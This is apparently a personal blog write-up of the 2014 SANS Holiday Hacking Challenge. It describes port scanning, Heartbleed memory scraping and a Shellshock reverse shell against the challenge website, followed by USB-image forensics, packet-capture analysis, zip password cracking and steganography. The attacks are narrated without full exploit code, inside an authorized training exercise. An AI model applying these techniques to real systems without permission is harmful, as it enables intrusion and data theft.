2014 SANS Holiday Hacking Carol Challenge

Every year, the SANS institute hosts a holiday hacking challenge open to any and all that want to participate. This year I decided to hop on board after @n3tl0kr from our #MISEC crew sent out the following tweet:

In this year’s challenge, you’ll get to match wits with an Artificially Intelligent agent, exploit a target machine, and do some detailed packet capture and file analysis, all with the goal of unraveling the mysteries of the Ghosts of Hacking Past, Present, and Future to save old Ebenezer Scrooge from certain doom.

I was hooked…

The Task

Scrooge has been transformed by the secrets revealed by the visiting specters. But how? Analyze the evidence provided in our tale, and answer the following questions:

What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?

What two secrets did the Ghost of Hacking Present deposit on the http://www.scrooge-and-marley.com website? You have permission to attack that website (TCP port 80 and 443 only) with the goal of retrieving those secrets, but please do not attempt any denial of service attacks or performance hogging attacks on that machine.

What four secrets are found on the USB file system image bestowed by the Ghost of Hacking Future?

Question 1: What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?

Because the ghost of Mr. Alan Turing was so generous to provide a target IP address, I was able to dive right into the scanning phase of my ethical hacking process. I needed to figure out if an active machine lived at this address or not.

I first decided to PING the target 173.255.233.59 which was successful.

I noticed the Time to Live (TTL) value was 52 which initially suggested that I was dealing with some type of a Linux/Unix kernel around ~12 networks away (TTL value for Linux is 64 and value is reduced at each hop).

At this point I wanted to proceed to port scanning which I unfortunately spent a significant amount of time searching through a dead end. The scan results had only shown that port 22 (SSH) was open. Banner info and thumbprint info proved to be useless at this point so I started to adjust my scanning parameters of NMAP. Scanning the target with a stealthy SYN scan on all ports which ended finding some high port (31124) that was open

I don’t know what runs on this port so I did want any curious hacker would do and used TELNET to connect (what’s the worst that can happen?). And this, is where I met dearest ELIZA.

I did some research I was able to find out that ELIZA was a computer program created to pass Allan Turing’s “Turing Test”. ELIZA was supposed to provide human like answers to questions by parsing user input and keywords and giving canned responses. But what secrets did she possess? I spent a good while getting to know ELIZA, asking questions, looking at responses, and after going back to the story, I saw some hints.

Feel free to connect with her, surf the Internet together, and see if you can discover her secret.”

After countless commands without getting anything back I was able to get a response that was different. I typed

and was given the HTML page title saying “does this look accurate?” I tried multiple times with various websites and continued to get the same type of console response back which was not helpful. But what was happening on the server side? What type of request was being sent and relayed back to me in ELIZAs console output? Luckily I have a web server (the one your reading!) that is publicly accessible and I asked ELIZA to browse to it.

Again it is always nice to have a target to start with. I did not need to do much with port scanning since the instructions said to only attack on port 80 and port 443 with no DoS cause that’s pointless for this challenge. I did ping the server and got an immediate response from 23.239.15.124 with a TTL of 52. So again first assumptions are that it is a linux/unix kernel.

I visited the site and downloaded it to work offline. Analyzed the source code and noticed a link to a contact page that loads a submit.sh script file. Running the submit function only brings the user back to the home page for http://scrooge-and-marley.com.

Now to scan for vulnerabilities, since my tools are not enterprise level and can only scan private IPs I was forced to use third party vulnerability tools. I started with Heartbleed since I could only assume that the server was vulnerable to both Shellshock and Heartbleed after reading this hint.

To help you understand, I’ve magically introduced two special secrets on your very own company website, www.scrooge-and-marley.com. Those secrets should shock your heart, teaching you important lessons for all time.”

I used an online Heartbleed scanning tool against http://scrooge-and-marley.com and sure enough the results came back positive for this OpenSSL vulnerability.

I needed an exploit so I downloaded a verified Heartbleed python script from a well-known site and started to plan my attack. I loaded up Kali in a VM and I wanted to keep looping the script over and over since the results from RAM derived from a buffer overflow are unpredictable and random. I wanted to run the exploit over a period of time to collect as much data as possible.

Because the target script is run as CGI, the web server passed the script to environment variable HTTP_COOKIE containing the value received in the header. When the vulnerable Bash was called by the CGI script, it automatically executed the command and the output appeared in the response HTML page meaning that it is a vulnerable to Shellshock. I needed an exploit so I downloaded a verified Shellshock PHP script from a well-known site and started to plan my attack. Since I needed to create a reverse shell I had to make sure I had a machine that was accessible from the internet. A little port forwarding magic on my router for port 6969 to my Kali VM IP Address, tied in with the command below to start my listener, I was ready to go.

Running the exploit immediately produced a shell prompt and I *thought I was done. Only few commands would work like echo, and pwd, but I could not list the contents of the directory I was in! I honestly spent the most amount of time on this secret since I had the least experience with native POSIX. After intense research and some collaboration with a Linux admin I was able to list the contents of the current directory by typing

[sourcecode collapse=”false” gutter=”false”]echo “%sn” *[/sourcecode]

I then changed directories into the root folder and listed the contents to see a file called secret. Now the second hardest part was to somehow display the file to console and since none of my usual commands would work I reached back out to my Linux guru for advice. I knew echo works but how do you echo the contents of a file to console?? After many hours and endless variations of syntax the below command finally worked to unveil the secret!

Question 3: What four secrets are found on the USB File system image bestowed by the Ghost of Hacking Future?

When I first downloaded the hhusb.dd.bin USB image I wanted to ensure that none of the contents of the image would be modified by simply extracting them with an archiving tool like 7-zip. Instead, I used a free forensics tool for Windows called Autopsy which could prove useful in analyzing the image without modifying its contents. I created a new cause, imported the BIN and I was on my way.

You can see that Autopsy was able to sort the image into file types and notify me that there were files that were encrypted contained in this image. It also showed me that there was a deleted file found in the image which could be interesting.

I started to analyze the Office document “LetterFromJacktoChuck.doc” and read the contents. Though it was interesting in nature, I was not able to see any secrets in the direct text of the document. I started searching further into the metadata of this document and it was there in the “Custom” attribute that the USB Secret #1 was found.

USB Secret #1: Your demise is a source of mirth.

I then wanted to see what was in the Hh2014-schat.pcapng file. I opened the file in Wireshark and started searching for interesting items. I started to search for all HTTP POST requests first. And traced the TCP stream of interesting packets and uncovered a conversation that could be interesting.

Looking at each Post, right clicking and following the TCP stream I was able to piece together the conversation

“id”:”2050686064.4648.7a3afc70717ab3.80889290″,”sender”:”2a368e544111c18030856a46320200e68ad8a263″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able scrape together enough to meet him minimum payment and stay out of debtor’s prison. Please tell me of your progress, my love.”,”timestamp”:2050686064

“id”:”2050686089.2728.7a3afc89429941.79812946″,”sender”:”d5c1bc63db3b1c59cc312503433470270e146e24″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear.”,”timestamp”:2050686089

“id”:”2050686101.3766.7a3afc955bf246.40975752″,”sender”:”2a368e544111c18030856a46320200e68ad8a263″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“Is it good… or bad?”,”timestamp”:2050686101

“id”:”2050686139.2382.7a3afcbb3a2774.07852556″,”sender”:”d5c1bc63db3b1c59cc312503433470270e146e24″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“No. There is hope yet, Caroline.”,”timestamp”:2050686139

“id”:”2050686166.3458.7a3afcd6546eb7.19699057″,”sender”:”2a368e544111c18030856a46320200e68ad8a263″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“If he relents, there is. Nothing is past hope, if such a miracle has happened.”,”timestamp”:2050686166

“id”:”2050686180.628.7a3afce4995195.67896075″,”sender”:”d5c1bc63db3b1c59cc312503433470270e146e24″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“He is past relenting. He is dead.”,”timestamp”:2050686180

“id”:”2050686208.1888.7a3afd002e16a8.60198759″,”sender”:”2a368e544111c18030856a46320200e68ad8a263″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“That is wondrous news! To whom will our debt be transferred?”,”timestamp”:2050686208

“id”:”2050686258.0418.7a3afd320a3816.89103764″,”sender”:”d5c1bc63db3b1c59cc312503433470270e146e24″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“I don’t know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline!”,”timestamp”:2050686258

“id”:”2050686293.3549.7a3afd5556a476.91742867″,”sender”:”2a368e544111c18030856a46320200e68ad8a263″,”recipient”:”channel|xxx”,”type”:”msg”,”body”:“I’ve just told our children about Mr. Scrooge’s death, and all of their faces are brighter for it. We now have a very happy house. I so love you.”,”timestamp”:2050686293

Unfortunately the address of chat.scrooge-and-marley.com was not active so I was not able to go any further with this.

I had some filters saved at this point and I wanted to save the capture as a new file to make it easier for me and when I was saving as a pcap a message came up in Wireshark saying that there were comments in this file that will be lost and am I sure I want to save as a pcap instead of a pcapnp?

Well I knew that I did not make any comments in the capture so I decided to see what comments were there. Scrolling through I reached packet # 2000 which contained a comment that looked encoded in base 64. Echoing the string in the console and piping it to base64 –d I discovered USB Secret #2!

USB Secret #2: Your demise is a source of relief.

I did find something else in the Wireshark packet capture that I will get to for USB Secret #4, but first…

I wanted to check into that encrypted file. I was able to see the file contents of the zip file but I was not able to open it. The contents of the ZIP file contained a picture file called Bed_Curtains.png and it was password protected.

I tried guessing some passwords and did not have any luck so I decided to run a dictionary attack against it in Kali Linux. I have a directory that contains some word lists to use to attack this file and I looped through each word list running the tool fcrackzip. It turns out that the attack was successful since the word “shambolic” was found in the rockyou.txt word list to be the password for this zip!!!

I thought initially that there might be some stenography involved but I wanted to check Autopsy first. Looking through extracted strings from this file revealed the secret hidden within.

On the 88th page of the extracted strings was the Secret #3!

USB Secret #3: Your demise is a source of gain for others.

I mentioned in the process of analyzing the capture file that I found another clue. I love to use PowerShell when possible and decided to write up a quick command that will parse a capture file and extract all unique URLs found.

I see that this clue leads to a steganography tool that uses the f5 algorithm to encode data in pictures. Well I know that there was that picture found in that [DELETED] directory, maybe there was a secret within?

I downloaded the tool to my Kali box and ran the command syntax and what do you know! I found USB Secret #4!

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.

Through the process of performing this challenge I have not only sharpened existing skills, but I have learned many new skills to add to my forensics tool belt. Although it seems like in this write-up that I had the right answers to every question, it really tool a LOT of wrong guesses and dead ends before the answer was unveiled. I also realized I should document more DURING the exploit so I didn’t have to go back to get screencaps 🙂

Otherwise, I was very happy to complete this successfully and look forward to next year’s challenge!

All Secrets:

Eliza Secret: ”Machines take me by surprise with great frequency. –Alan Turing”

Website Secret #1: Hacking can be noble

Website Secret #2: Use your skills for good.

USB Secret #1: Your demise is a source of mirth.

USB Secret #2: Your demise is a source of relief.

USB Secret #3: Your demise is a source of gain for others.

USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.